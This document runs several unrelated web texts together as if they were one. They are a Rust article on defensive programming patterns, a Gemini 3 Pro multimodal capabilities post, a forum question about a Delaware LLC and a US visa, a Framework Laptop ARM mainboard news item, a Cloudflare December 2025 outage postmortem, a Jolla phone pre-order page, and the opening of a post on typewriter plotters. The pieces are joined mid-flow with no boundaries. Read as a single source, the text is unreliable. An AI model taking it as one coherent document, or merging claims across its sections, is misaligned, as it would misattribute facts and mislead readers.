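The impl itself isn’t shown above; based on that description, a hand-written version would look roughly like this (assuming the field types implement PartialEq):

impl PartialEq for PizzaOrder {
    fn eq(&self, other: &Self) -> bool {
        // Compare only what's actually on the pizza;
        // `ordered_at` is deliberately left out.
        self.size == other.size
            && self.toppings == other.toppings
            && self.crust_type == other.crust_type
    }
}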
Now imagine your team adds a field for customization options:
struct PizzaOrder {
    size: PizzaSize,
    toppings: Vec<Topping>,
    crust_type: CrustType,
    ordered_at: SystemTime,
    extra_cheese: bool, // New field added
}
Your
PartialEq
implementation still compiles, but is it correct?
Should
extra_cheese
be part of the equality check?
Probably yes - a pizza with extra cheese is a different order!
But you’ll never know because the compiler won’t remind you to think about it.
Here’s the defensive approach using destructuring:
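The original code isn’t shown here, but a destructuring version of the same impl would look roughly like this:

impl PartialEq for PizzaOrder {
    fn eq(&self, other: &Self) -> bool {
        // Destructure `self` completely: if someone adds a field,
        // this pattern stops compiling until it's accounted for.
        let PizzaOrder {
            size,
            toppings,
            crust_type,
            ordered_at: _, // explicitly ignored
        } = self;

        *size == other.size
            && *toppings == other.toppings
            && *crust_type == other.crust_type
    }
}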
Now when someone adds the
extra_cheese
field, this code won’t compile anymore.
The compiler forces you to decide: should
extra_cheese
be included in the comparison or explicitly ignored with
extra_cheese: _
?
This pattern works for any trait implementation where you need to handle struct fields:
Hash
,
Debug
,
Clone
, etc.
It’s especially valuable in codebases where structs evolve frequently as requirements change.
Sometimes there’s no conversion that will work 100% of the time.
That’s fine.
When that’s the case, resist the temptation to offer a
From
implementation out of habit; use
TryFrom
instead.
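The snippet being discussed isn’t included above; the shape of the problem, sketched with hypothetical RawPort and Port types, is something like this:

// Hypothetical types for illustration: a raw string value and a parsed port.
struct RawPort(String);
struct Port(u16);

impl From<RawPort> for Port {
    fn from(raw: RawPort) -> Self {
        // Silently falls back to a default port if parsing fails.
        Port(raw.0.parse().unwrap_or_else(|_| 8080))
    }
}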
The
unwrap_or_else
is a hint that this conversion can fail in some way.
We set a default value instead, but is it really the right thing to do for all callers?
This should be a
TryFrom
implementation instead, making the fallible nature explicit.
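Under the same assumptions, a TryFrom version makes the failure visible to the caller (it replaces the From impl above; the two cannot coexist because of std’s blanket TryFrom implementation):

impl TryFrom<RawPort> for Port {
    type Error = std::num::ParseIntError;

    fn try_from(raw: RawPort) -> Result<Self, Self::Error> {
        // The caller now has to handle the parse failure explicitly.
        Ok(Port(raw.0.parse()?))
    }
}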
We fail fast instead of continuing with a potentially flawed business logic.
It’s tempting to use
match
in combination with a catch-all pattern like
_ => {}
, but this can haunt you later.
The problem is that you might forget to handle a new case that was added later.
By spelling out all variants explicitly, the compiler will warn you when a new variant is added, forcing you to handle it.
Another case of putting the compiler to work.
If the code for two variants is the same, you can group them:
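For example, with a hypothetical status enum, two variants can share an arm while every case stays spelled out:

enum PaymentStatus {
    Pending,
    Processing,
    Completed,
    Failed,
}

fn describe(status: PaymentStatus) -> &'static str {
    match status {
        // Two variants that share the same behavior can be grouped...
        PaymentStatus::Pending | PaymentStatus::Processing => "in progress",
        PaymentStatus::Completed => "done",
        PaymentStatus::Failed => "failed",
        // ...and because there is no `_` arm, adding a new variant
        // becomes a compile error until this match is updated.
    }
}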
Using
_
as a placeholder for unused variables can lead to confusion.
For example, you might get confused about which variable was skipped.
That’s especially true for boolean flags:
match self {
    Self::Rocket(_, _, ..) => { ... }
}
In the above example, it’s not clear which variables were skipped and why.
Better to use descriptive names for the variables that are not used:
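Something along these lines, with a hypothetical enum whose variant fields are invented for illustration:

enum Vehicle {
    // Hypothetical variant: two boolean flags and a payload mass.
    Rocket(bool, bool, u32),
    Car,
}

impl Vehicle {
    fn is_fancy(&self) -> bool {
        match self {
            // Underscore-prefixed names are still "unused", but the reader
            // can see exactly which flags are being ignored.
            Vehicle::Rocket(_has_boosters, _is_reusable, ..) => true,
            Vehicle::Car => false,
        }
    }
}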
If you only want your data to be mutable temporarily, make that explicit.
let mut data = get_vec();
data.sort();
let data = data; // Shadow to make immutable

// Here `data` is immutable.
This pattern is often called “temporary mutability” and helps prevent accidental modifications after initialization.
See the
Rust unofficial patterns book
for more details.
You can go one step further and do the initialization part in a scope block:
let data = {
    let mut data = get_vec();
    data.sort();
    data // Return the final value
};
// Here `data` is immutable
This way, the mutable variable is confined to the inner scope, making it clear that it’s only used for initialization.
In case you use any temporary variables during initialization, they won’t leak into the outer scope.
In our case above, there were none, but imagine if we had a temporary vector to hold intermediate results:
let data = {
    let mut data = get_vec();
    let temp = compute_something();
    data.extend(temp);
    data.sort();
    data // Return the final value
};
Here,
temp
is only accessible within the inner scope, which prevents it from accidental use later on.
This is especially useful when you have multiple temporary variables during initialization that you don’t want accessible in the rest of the function.
The scope makes it crystal clear that these variables are only meant for initialization.
The following pattern is only truly helpful for libraries and APIs that need to be robust against future changes.
In such a case, you want to ensure that all instances of a type are created through a constructor function that enforces validation logic.
Because without that, future refactorings can easily lead to invalid states.
For application code, it’s probably best to keep things simple.
You typically have all the call sites under control and can ensure that validation logic is always called.
Let’s say you have a simple type like the following:
pub struct S {
    pub field1: String,
    pub field2: u32,
}
Now you want to add validation logic to ensure invalid states are never created.
One pattern is to return a
Result
from the constructor:
impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        if field1.is_empty() {
            return Err("field1 cannot be empty".to_string());
        }
        if field2 == 0 {
            return Err("field2 cannot be zero".to_string());
        }
        Ok(Self { field1, field2 })
    }
}
But nothing stops someone from bypassing your validation by creating an instance directly:
let s = S {
    field1: "".to_string(),
    field2: 0,
};
This should not be possible!
It is our implicit invariant that’s not enforced by the compiler: the validation logic is decoupled from struct construction.
These are two separate operations, which can be changed independently and the compiler won’t complain.
To force
external code
to go through your constructor, add a private field:
pub struct S {
    pub field1: String,
    pub field2: u32,
    _private: (), // This prevents external construction
}

impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        if field1.is_empty() {
            return Err("field1 cannot be empty".to_string());
        }
        if field2 == 0 {
            return Err("field2 cannot be zero".to_string());
        }
        Ok(Self { field1, field2, _private: () })
    }
}
Now code outside your module cannot construct
S
directly because it cannot access the
_private
field.
The compiler enforces that all construction must go through your
new()
method, which includes your validation logic!
Note that the underscore prefix is just a
naming convention
to indicate the field is intentionally unused; it’s the lack of
pub
that makes it private and prevents external construction.
For libraries that need to evolve over time, you can also use the
#[non_exhaustive]
attribute instead:
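A minimal sketch of that variant (with the validation body elided) might look like this:

#[non_exhaustive]
pub struct S {
    pub field1: String,
    pub field2: u32,
}

impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        // ... same validation as before ...
        Ok(Self { field1, field2 })
    }
}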
This has the same effect of preventing construction outside your crate, but also signals to users that you might add more fields in the future.
The compiler will prevent them from using struct literal syntax, forcing them to use your constructor.
There’s a big difference between these two approaches:
#[non_exhaustive]
only works across crate boundaries.
It prevents construction outside your crate.
_private
works at the module boundary.
It prevents construction outside the module
, but within the same crate.
On top of that, some developers find
_private: ()
more explicit about intent: “this struct has a private field that prevents construction.”
With
#[non_exhaustive]
, the primary intent is signaling that fields might be added in the future, and preventing construction is more of a side effect.
But what about code within the
same module
?
With the patterns above, code in the same module can still bypass your validation:
// Still compiles in the same module!
let s = S {
    field1: "".to_string(),
    field2: 0,
    _private: (),
};
Rust’s privacy works at the module level, not the type level.
Anything in the same module can access private items.
If you need to enforce constructor usage even within your own module, you need a more defensive approach using nested private modules:
mod inner {
    pub struct S {
        pub field1: String,
        pub field2: u32,
        _seal: Seal,
    }

    // This type is private to the inner module
    struct Seal;

    impl S {
        pub fn new(field1: String, field2: u32) -> Result<Self, String> {
            if field1.is_empty() {
                return Err("field1 cannot be empty".to_string());
            }
            if field2 == 0 {
                return Err("field2 cannot be zero".to_string());
            }
            Ok(Self { field1, field2, _seal: Seal })
        }
    }
}

// Re-export for public use
pub use inner::S;
Now even code in your outer module cannot construct
S
directly because
Seal
is trapped in the private
inner
module.
Only the
new()
method, which lives in the same module as
Seal
, can construct it.
The compiler guarantees that all construction, even internal construction, goes through your validation logic.
You could still access the public fields directly, though.
let mut s = S::new("valid".to_string(), 42).unwrap();
s.field1 = "".to_string(); // Still possible to mutate fields directly
To prevent that, you can make the fields private and provide getter methods instead:
mod inner {
    pub struct S {
        field1: String,
        field2: u32,
        _seal: Seal,
    }

    struct Seal;

    impl S {
        pub fn new(field1: String, field2: u32) -> Result<Self, String> {
            if field1.is_empty() {
                return Err("field1 cannot be empty".to_string());
            }
            if field2 == 0 {
                return Err("field2 cannot be zero".to_string());
            }
            Ok(Self { field1, field2, _seal: Seal })
        }

        pub fn field1(&self) -> &str {
            &self.field1
        }

        pub fn field2(&self) -> u32 {
            self.field2
        }
    }
}
Now the only way to create an instance of
S
is through the
new()
method, and the only way to access its fields is through the getter methods.
For external code
: Add a private field like
_private: ()
or use
#[non_exhaustive]
For internal code
: Use nested private modules with a private “seal” type
Choose based on your needs
: Most code only needs to prevent external construction; forcing internal construction is more defensive but also more complex
The key insight is that by making construction impossible without access to a private type, you turn your validation logic from a convention into a guarantee enforced by the compiler.
So let’s put that compiler to work!
The
#[must_use]
attribute is often neglected.
That’s sad, because it’s such a simple yet powerful mechanism to prevent callers from accidentally ignoring important return values.
#[must_use = "Configuration must be applied to take effect"]
pub struct Config {
    // ...
}

impl Config {
    pub fn new() -> Self {
        // ...
    }

    pub fn with_timeout(mut self, timeout: Duration) -> Self {
        self.timeout = timeout;
        self
    }
}
Now if someone creates a
Config
but forgets to use it, the compiler will warn them
(even with a custom message!):
let config = Config::new();
config.with_timeout(Duration::from_secs(30)); // Warning: Configuration must be applied to take effect

// Correct usage:
let config = Config::new().with_timeout(Duration::from_secs(30));
apply_config(config);
This is especially useful for guard types that need to be held for their lifetime and results from operations that must be checked.
The standard library uses this extensively.
For example,
Result
is marked with
#[must_use]
, which is why you get warnings if you don’t handle errors.
Boolean parameters make code hard to read at the call site and are error-prone.
We all know the scenario where we’re sure this will be the last boolean parameter we’ll ever add to a function.
// Too many boolean parameters
fn process_data(data: &[u8], compress: bool, encrypt: bool, validate: bool) {
    // ...
}

// At the call site, what do these booleans mean?
process_data(&data, true, false, true); // What does this do?
It’s impossible to understand what this code does without looking at the function signature.
Even worse, it’s easy to accidentally swap the boolean values.
Instead, use enums to make the intent explicit:
enum Compression {
    Strong,
    Medium,
    None,
}

enum Encryption {
    AES,
    ChaCha20,
    None,
}

enum Validation {
    Enabled,
    Disabled,
}

fn process_data(
    data: &[u8],
    compression: Compression,
    encryption: Encryption,
    validation: Validation,
) {
    // ...
}

// Now the call site is self-documenting
process_data(
    &data,
    Compression::Strong,
    Encryption::None,
    Validation::Enabled,
);
This is much more readable and the compiler will catch mistakes if you pass the wrong enum type.
You will notice that the enum variants can be more descriptive than just
true
or
false
.
And more often than not, there are more than two meaningful options; especially for programs which grow over time.
For functions with many options, you can configure them using a parameter struct:
struct ProcessDataParams {
    compression: Compression,
    encryption: Encryption,
    validation: Validation,
}

impl ProcessDataParams {
    // Common configurations as constructor methods
    pub fn production() -> Self {
        Self {
            compression: Compression::Strong,
            encryption: Encryption::AES,
            validation: Validation::Enabled,
        }
    }

    pub fn development() -> Self {
        Self {
            compression: Compression::None,
            encryption: Encryption::None,
            validation: Validation::Enabled,
        }
    }
}

fn process_data(data: &[u8], params: ProcessDataParams) {
    // ...
}

// Usage with preset configurations
process_data(&data, ProcessDataParams::production());

// Or customize for specific needs
process_data(&data, ProcessDataParams {
    compression: Compression::Medium,
    encryption: Encryption::ChaCha20,
    validation: Validation::Enabled,
});
This approach scales much better as your function evolves.
Adding new parameters doesn’t break existing call sites, and you can easily add defaults or make certain fields optional.
The preset methods also document common use cases and make it easy to use the right configuration for different scenarios.
Rust is often criticized for not having named parameters, but using a parameter struct is arguably even better for larger functions with many options.
Defensive programming in Rust is about leveraging the type system and compiler to catch bugs before they happen.
By following these patterns, you can:
Make implicit invariants explicit and compiler-checked
Future-proof your code against refactoring mistakes
Reduce the surface area for bugs
It’s a skill that doesn’t come naturally and it’s not covered in most Rust books, but knowing these patterns can make the difference between code that works but is brittle, and code that is robust and maintainable for years to come.
Remember: if you find yourself writing
// this should never happen
, take a step back and ask how the compiler could enforce that invariant for you instead.
The best bug is the one that never compiles in the first place.
Zellij: A terminal workspace with batteries included
Gemini 3 Pro delivers state-of-the-art performance across document, spatial, screen and video understanding.
Gemini 3 Pro represents a generational leap from simple recognition to true visual and spatial reasoning. It is our most capable multimodal model ever, delivering state-of-the-art performance across document, spatial, screen and video understanding.
This model sets new highs on vision benchmarks such as MMMU Pro and Video MMMU for complex visual reasoning, as well as use-case-specific benchmarks across document, spatial, screen and long video understanding.
1. Document understanding
Real-world documents are messy, unstructured, and difficult to parse — often filled with interleaved images, illegible handwritten text, nested tables, complex mathematical notation and non-linear layouts. Gemini 3 Pro represents a major leap forward in this domain, excelling across the entire document processing pipeline — from highly accurate Optical Character Recognition (OCR) to complex visual reasoning.
Intelligent perception
To truly understand a document, a model must accurately detect and recognize text, tables, math formulas, figures and charts regardless of noise or format.
A fundamental capability is "derendering" — the ability to reverse-engineer a visual document back into structured code (HTML, LaTeX, Markdown) that would recreate it. As illustrated below, Gemini 3 demonstrates accurate perception across diverse modalities including converting an 18th-century merchant log into a complex table, or transforming a raw image with mathematical annotation into precise LaTeX code.
Example 1: Handwritten Complex Table from 18th century Albany Merchant’s Handbook (
HTML transcription
)
Example 2: Reconstructing equations from an image
Example 3: Reconstructing Florence Nightingale's original Polar Area Diagram into an interactive chart (with a toggle!)
Sophisticated reasoning
Users can rely on Gemini 3 to perform complex, multi-step reasoning across tables and charts — even in long reports. In fact, the model notably outperforms the human baseline on the CharXiv Reasoning benchmark (80.5%).
To illustrate this, imagine a user analyzing the 62-page U.S. Census Bureau "
Income in the United States: 2022
" report with the following prompt: “Compare the 2021–2022 percent change in the Gini index for "Money Income" versus "Post-Tax Income", and what caused the divergence in the post-tax measure, and in terms of "Money Income", does it show the lowest quintile's share rising or falling?”
Swipe through the images below to see the model's step-by-step reasoning.
Visual Extraction: To answer the Gini Index Comparison question, Gemini located and cross-referenced this info in Figure 3 about “Money Income decreased by 1.2 percent” and in Table B-3 about “Post-Tax Income increased by 3.2 percent”
Causal Logic: Crucially, Gemini 3 does not stop at the numbers; it correlates this gap with the text’s policy analysis, correctly identifying Lapse of ARPA Policies and the end of Stimulus Payments are the main causes.
Numerical Comparison: To determine whether the lowest quintile’s share was rising or falling, Gemini 3 looked at Table A-3, compared the values 2.9 and 3.0, and concluded that “the share of aggregate household income held by the lowest quintile was rising.”
2. Spatial understanding
Gemini 3 Pro is our strongest spatial understanding model so far. Combined with its strong reasoning, this enables the model to make sense of the physical world.
Pointing capability:
Gemini 3 has the ability to point at specific locations in images by outputting pixel-precise coordinates. Sequences of 2D points can be strung together to perform complex tasks, such as estimating human poses or reflecting trajectories over time.
Open vocabulary references:
Gemini 3 identifies objects and their intent using an open vocabulary. The most direct application is robotics: the user can ask a robot to generate spatially grounded plans like, “Given this messy table, come up with a plan on how to sort the trash.” This also extends to AR/XR devices, where the user can request an AI assistant to “Point to the screw according to the user manual.”
3. Screen understanding
Gemini 3.0 Pro’s spatial understanding really shines through its screen understanding of desktop and mobile OS screens. This reliability helps make computer use agents robust enough to automate repetitive tasks. UI understanding capabilities can also enable tasks like QA testing, user onboarding and UX analytics. The following computer use demo shows the model perceiving and clicking with high precision.
4. Video understanding
Gemini 3 Pro takes a massive leap forward in how AI understands video, the most complex data format we interact with. It is dense, dynamic, multimodal and rich with context.
1. High frame rate understanding:
We have optimized the model to be much stronger at understanding fast-paced actions when sampling at more than one frame per second. Gemini 3 Pro can capture rapid details — vital for tasks like analyzing golf swing mechanics.
By processing video at 10 FPS—10x the default speed—Gemini 3 Pro catches every swing and shift in weight, unlocking deep insights into player mechanics.
2. Video reasoning with “thinking” mode:
We upgraded "thinking" mode to go beyond object recognition toward true video reasoning. The model can now better trace complex cause-and-effect relationships over time. Instead of just identifying
what
is happening, it understands
why
it is happening.
3. Turning long videos into action:
Gemini 3 Pro bridges the gap between video and code. It can extract knowledge from long-form content and immediately translate it into functioning apps or structured code.
5. Real-world applications
Here are a few ways we think various fields will benefit from Gemini 3’s capabilities.
Education
Gemini 3.0 Pro’s enhanced vision capabilities drive significant gains in the education field, particularly for diagram-heavy questions central to math and science. It successfully tackles the full spectrum of multimodal reasoning problems found from middle school through post-secondary curriculums. This includes visual reasoning puzzles (like
Math Kangaroo
) and complex chemistry and physics diagrams.
Gemini 3’s visual intelligence also powers the generative capabilities of
Nano Banana Pro
. By combining advanced reasoning with precise generation, the model, for example, can help users identify exactly where they went wrong in a homework problem.
Prompt: “Here is a photo of my homework attempt. Please check my steps and tell me where I went wrong. Instead of explaining in text, show me visually on my image.” (Note: Student work is shown in blue; model corrections are shown in red). [
See prompt in Google AI Studio
]
Medical and biomedical imaging
Gemini 3 Pro
1
stands as our most capable general model for medical and biomedical imagery understanding, achieving state-of-the-art performance across major public benchmarks in MedXpertQA-MM (a difficult expert-level medical reasoning exam), VQA-RAD (radiology imagery Q&A) and MicroVQA (multimodal reasoning benchmarks for microscopy based biological research).
Input image from
MicroVQA
- a benchmark for microscopy-based biological research
Law and finance
Gemini 3 Pro’s enhanced document understanding helps professionals in finance and law tackle highly complex workflows. Finance platforms can seamlessly analyze dense reports filled with charts and tables, while legal platforms benefit from the model's sophisticated document reasoning.
6. Media resolution control
Gemini 3 Pro improves the way it processes visual inputs by preserving the native aspect ratio of images. This drives significant quality improvements across the board.
Additionally, developers gain granular control over performance and cost via the new
media_resolution
parameter. This allows you to tune visual token usage to balance fidelity against consumption:
High resolution:
Maximizes fidelity for tasks requiring fine detail, such as dense OCR or complex document understanding.
Low resolution:
Optimizes for cost and latency on simpler tasks, such as general scene recognition or long-context tasks.
Hi Peter, thanks for doing the AMA!
I have a Delaware registered LLC (10 years old), I managed to get even an EIN remotely.
However, I can't open a bank account remotely and so I have just been paying the registered agent fees and Delaware gov taxes for the LLC all these years.
I however, genuinely want to come to the states to open the bank account and actually expand my business into the US.
The LLC hasn't really had any meetings/etc. but taxes are paid. How do I use my LLC to apply for a B1/B2 to visit the US?
OR should I just close it and try the normal route? Thanks in advance!
Framework Laptop 13 gets ARM processor with 12 cores via upgrade kit
The Framework Laptop 13 can now be equipped with an ARM processor (Image source: Notebookcheck)
The Framework Laptop 13 has a replaceable mainboard, which means that the processor can be easily upgraded after purchase. While Framework itself only offers Intel and AMD CPUs, a mainboard with a high-performance ARM processor from a third-party manufacturer has now launched.
The
Qualcomm Snapdragon X Plus
and
Snapdragon X Elite
have proven that ARM processors have earned a place in the laptop market, as devices like the Lenovo IdeaPad Slim 5 stand out with their long battery life and an affordable price point.
MetaComputing is now offering an alternative to Intel, AMD and the Snapdragon X series. Specifically, the company has introduced a mainboard that can be installed in the Framework Laptop 13 or in a mini PC case. This mainboard is equipped with a CIX CP8180 ARM chipset, which is also found inside the
Minisforum MS-R1
. This processor has a total of eight ARM Cortex-A720 performance cores; the two fastest can hit boost clock speeds of up to 2.6 GHz. Moreover, there are four Cortex-A520 efficiency cores.
The mainboard can be installed in the Framework Laptop 13 or a mini PC case (Image source: MetaComputing)
Additionally, there’s an ARM Immortalis-G720 GPU with ten cores and an AI accelerator with a performance of 30 TOPS. This chipset is likely slower than the Snapdragon X Elite or a current flagship smartphone chip, but it should still provide enough performance for many everyday tasks. Either way, this mainboard upgrade might only be interesting for developers for the most part, because
early tests
show that the SoC already draws about 16 watts at idle, which means battery life will likely be fairly short when combined with the 55Wh battery of the Framework Laptop 13.
Price and availability
The MetaComputing ARM AI PC Kit is available now at the manufacturer’s
official online shop
. The base model with 16GB RAM, 1TB SSD and a mini PC case costs $549. The mainboard can be installed in a previously purchased Framework Laptop 13. Users who don’t own a Framework Laptop can order a bundle including the notebook for $999. MetaComputing charges an additional $100 for 32GB RAM. Shipping is free worldwide, but these list prices do not include import fees or taxes.
On December 5, 2025, at 08:47 UTC (all times in this blog are UTC), a portion of Cloudflare’s network began experiencing significant failures. The incident was resolved at 09:12 (~25 minutes total impact), when all services were fully restored.
A subset of customers were impacted, accounting for approximately 28% of all HTTP traffic served by Cloudflare. Several factors needed to combine for an individual customer to be affected as described below.
The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind. Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability
disclosed this week
in React Server Components.
Any outage of our systems is unacceptable, and we know we have let the Internet down again following the incident on November 18. We will be publishing details next week about the work we are doing to stop these types of incidents from occurring.
What happened
The graph below shows HTTP 500 errors served by our network during the incident timeframe (red line at the bottom), compared to unaffected total Cloudflare traffic (green line at the top).
Cloudflare's Web Application Firewall (WAF) provides customers with protection against malicious payloads, allowing them to be detected and blocked. To do this, Cloudflare’s proxy buffers HTTP request body content in memory for analysis. Before today, the buffer size was set to 128KB.
As part of our ongoing work to protect customers using React against a critical vulnerability,
CVE-2025-55182
, we started rolling out an increase to our buffer size to 1MB, the default limit allowed by Next.js applications. We wanted to make sure as many customers as possible were protected.
This change was being rolled out using our gradual deployment system, and, as part of this rollout, we identified an increase in errors in one of our internal tools which we use to test and improve new WAF rules. As this was an internal tool, and the fix being rolled out was a security improvement, we decided to disable the tool for the time being as it was not required to serve or protect customer traffic.
Disabling this was done using our global configuration system. This system does not use gradual rollouts but rather propagates changes within seconds to the entire network and is under review
following the outage we recently experienced on November 18
.
Under certain circumstances in the FL1 version of our proxy, this latter change caused an error state that resulted in HTTP 500 error codes being served from our network.
As soon as the change propagated to our network, code execution in our FL1 proxy reached a bug in our rules module which led to the following LUA exception:
[lua] Failed to run module rulesets callback late_routing: /usr/local/nginx-fl/lua/modules/init.lua:314: attempt to index field 'execute' (a nil value)
resulting in HTTP code 500 errors being issued.
The issue was identified shortly after the change was applied, and was reverted at 09:12, after which all traffic was served correctly.
Customers that have their web assets served by our older FL1 proxy
AND
had the Cloudflare Managed Ruleset deployed were impacted. All requests for websites in this state returned an HTTP 500 error, with the small exception of some test endpoints such as
/cdn-cgi/trace
.
Customers that did not have the configuration above applied were not impacted. Customer traffic served by our China network was also not impacted.
The runtime error
Cloudflare’s rulesets system consists of sets of rules which are evaluated for each request entering our system. A rule consists of a filter, which selects some traffic, and an action which applies an effect to that traffic. Typical actions are “
block
”, “
log
”, or “
skip
”. Another type of action is “
execute
”, which is used to trigger evaluation of another ruleset.
Our internal logging system uses this feature to evaluate new rules before we make them available to the public. A top level ruleset will execute another ruleset containing test rules. It was these test rules that we were attempting to disable.
We have a killswitch subsystem as part of the rulesets system which is intended to allow a rule which is misbehaving to be disabled quickly. This killswitch system receives information from our global configuration system mentioned in the prior sections. We have used this killswitch system on a number of occasions in the past to mitigate incidents and have a well-defined Standard Operating Procedure, which was followed in this incident.
However, we have never before applied a killswitch to a rule with an action of “
execute
”. When the killswitch was applied, the code correctly skipped the evaluation of the execute action, and didn’t evaluate the sub-ruleset pointed to by it. However, an error was then encountered while processing the overall results of evaluating the ruleset:
if rule_result.action == "execute" then
rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end
This code expects that, if the ruleset has action=”execute”, the “rule_result.execute” object will exist. However, because the rule had been skipped, the rule_result.execute object did not exist, and Lua returned an error due to attempting to look up a value in a nil value.
This is a straightforward error in the code, which had existed undetected for many years. This type of code error is prevented by languages with strong type systems. In our replacement for this code in our new FL2 proxy, which is written in Rust, the error did not occur.
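As an illustration only (a minimal sketch, not Cloudflare’s actual FL2 code), modelling the execute payload as an Option in Rust forces the skipped-rule case to be handled at compile time:

// Sketch: the `execute` payload only exists for rules that actually ran
// an `execute` action, so "indexing into nil" cannot be written by accident.
struct ExecuteResult {
    results_index: usize,
}

struct RuleResult {
    action: String,
    // `None` when the rule was skipped, e.g. by a killswitch.
    execute: Option<ExecuteResult>,
}

fn attach_results(rule_result: &RuleResult, ruleset_results: &[Vec<String>]) {
    if rule_result.action == "execute" {
        // The compiler requires handling the skipped case explicitly.
        match &rule_result.execute {
            Some(execute) => {
                let _results = &ruleset_results[execute.results_index];
                // ... attach results ...
            }
            None => {
                // Rule was killswitched: nothing to attach.
            }
        }
    }
}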
What about the changes being made after the incident on November 18, 2025?
We made an unrelated change that caused a similar,
longer availability incident
two weeks ago on November 18, 2025. In both cases, a deployment to help mitigate a security issue for our customers propagated to our entire network and led to errors for nearly all of our customer base.
We have spoken directly with hundreds of customers following that incident and shared our plans to make changes to prevent single updates from causing widespread impact like this. We believe these changes would have helped prevent the impact of today’s incident but, unfortunately, we have not finished deploying them yet.
We know it is disappointing that this work has not been completed yet. It remains our first priority across the organization. In particular, the projects outlined below should help contain the impact of these kinds of changes:
Enhanced Rollouts & Versioning
: Similar to how we slowly deploy software with strict health validation, data used for rapid threat response and general configuration needs to have the same safety and blast mitigation features. This includes health validation and quick rollback capabilities among other things.
Streamlined break glass capabilities:
Ensure that critical operations can still be achieved in the face of additional types of failures. This applies to internal services as well as all standard methods of interaction with the Cloudflare control plane used by all Cloudflare customers.
"Fail-Open" Error Handling:
As part of the resilience effort, we are replacing the incorrectly applied hard-fail logic across all critical Cloudflare data-plane components. If a configuration file is corrupt or out-of-range (e.g., exceeding feature caps), the system will log the error and default to a known-good state or pass traffic without scoring, rather than dropping requests. Some services will likely give the customer the option to fail open or closed in certain scenarios. This will include drift-prevention capabilities to ensure this is enforced continuously.
Before the end of next week we will publish a detailed breakdown of all the resiliency projects underway, including the ones listed above. While that work is underway, we are locking down all changes to our network in order to ensure we have better mitigation and rollback systems before we begin again.
These kinds of incidents, and how closely they are clustered together, are not acceptable for a network like ours. On behalf of the team at Cloudflare we want to apologize for the impact and pain this has caused again to our customers and the Internet as a whole.
Timeline
Time (UTC) | Status            | Description
08:47      | INCIDENT start    | Configuration change deployed and propagated to the network
08:48      | Full impact       | Change fully propagated
08:50      | INCIDENT declared | Automated alerts
09:11      | Change reverted   | Configuration change reverted and propagation started
User configurable physical Privacy Switch - turn off your microphone, Bluetooth, Android apps, or whatever you wish
Scandinavian styling in its pure form
Honouring the original Jolla Phone form factor and design
Replaceable back cover
Available in three distinct, user-replaceable colours inspired by Nordic nature
Snow White
Kaamos Black
The Orange
An Independent Linux Phone
A successor to the iconic original Jolla Phone from 2013, brought to 2026 with modern specs and honoring the Jolla heritage design. And faster, smoother, more capable than the current Jolla C2.
A phone you can actually daily-drive. Still Private. Still Yours.
Defined together with the Community
Over the past months, Sailfish OS community members
voted
on what the next Jolla device should be. The key characteristics, specifications and features of the device.
Based on community voting and real user needs, this device has only one mission:
Put control back in your hands.
KEY BENEFITS OF PRE-ORDERING
Special Edition Back Cover — Pre-order batch only
Made as a thank-you to early supporters
Directly contribute in making the product a reality
Community Voice, Real Device:
The
questionnaire
received an overwhelming flow of input, and this project captures that
Now it is time to act!
Your pre-order determines whether the project becomes reality
Built for Longevity
Sailfish OS is proven to outlive mainstream support cycles. Long-term OS support, guaranteed for minimum 5 years. Incremental updates, and no forced obsolescence.
Your Phone Shouldn’t Spy on You
Mainstream phones send vast amounts of background data. A common Android phone sends megabytes of data per day to Google even if the device is not used at all.
Sailfish OS stays silent unless you explicitly allow connections.
DIT: DO IT TOGETHER
This isn’t your regular smartphone project.
It’s a community mission.
You voted on the device
You guided its specs and definition
You shaped the philosophy
And now you help bring it to life
Every pre-order helps make production a reality.
Cellular: 4G + 5G with dual nano-SIM and global roaming modem configuration
Display: 6.36” ~390ppi FullHD AMOLED, aspect ratio 20:9, Gorilla Glass
Cameras: 50MP Wide + 13MP Ultrawide main cameras, front facing wide-lens selfie camera
Battery: approx. 5,500mAh, user replaceable
Connectivity: WiFi 6, BT 5.4, NFC
Dimensions: ~158 x 74 x 9mm
Other: Power key fingerprint reader, user changeable backcover, RGB indication LED, Privacy Switch
Technical specification subject to final confirmation upon final payment and manufacturing. Minor alterations may apply.
FAQ
Why a pre-order system?
Because this is a community-funded device and we need committed pre-orders to turn the designs into a full product program and commit to order the first production batch. If we reach
2,000 units
we start the full product program. If not, you get a full refund.
Is the 99 € refundable?
Yes. Fully.
What is the normal price of the product, do I get discount participating to the pre-order?
The final price of the product is not set yet, but we estimate it will settle between 599€ and 699€ (incl. your local VAT). The final price depends on confirmation of the final specification and the Bill of Materials, which happens in due course during the product program. Memory component prices in particular have seen exceptionally high volatility this year.
By pre-ordering you confirm your special price of 499€ in total.
Can I cancel anytime?
Yes.
Is this phone real or just a concept?
It is real. Definition and real electro-mechanical design is underway, based on the community voting. To turn the designs into a full product program and commit to order the first batch, we need in minimum 2,000 committed pre-orders.
When will full specs be available?
Once the manufacturing pathway is confirmed at 2,000 pre-orders.
Will there be accessories, like a spare battery and protective case?
Yes, there will be. We’ll make those available in due course during the project.
When will the phone ship?
Estimated by end of
1H/2026
.
Will the Jolla Phone work outside Europe, can I use it e.g. in the U.S.?
Yes, we will design the cellular band configuration to enable global travelling as much as possible, including e.g. roaming in the U.S. carrier networks.
Can I buy the Jolla Phone if I’m outside Europe, can I use it e.g. in the U.S.?
The initial sales markets are the EU, UK, Switzerland and Norway. Entering other markets, such as the U.S. and Canada, will be decided in due course based on interest from those regions.
We will design the cellular band configuration to enable potential future markets, including major U.S. carrier networks.
Did you know there were typewriters that used ball point pens to draw not just text but also graphics? I’ve collected several of these over the years. Read on to discover a world that you didn’t know existed.
Typewriter plotters could act as a normal typewriter in that you could type on the keys and have the text printed on the page. The difference is it would use a tiny ball point pen to “draw” the text, character by character, onto the page. It’s mesmerizing to watch! Many also included the ability to print graphs and bar charts, although in practice it was likely cumbersome. In addition, some models had the ability to connect to a computer to print text or even custom graphics.
Panasonic
RK-P400C Penwriter
Panasonic made three models. The top-shelf model was the RK-P400C Penwriter, which included a built-in RS-232 port for computer control. It also came with a white pen for error correcting.
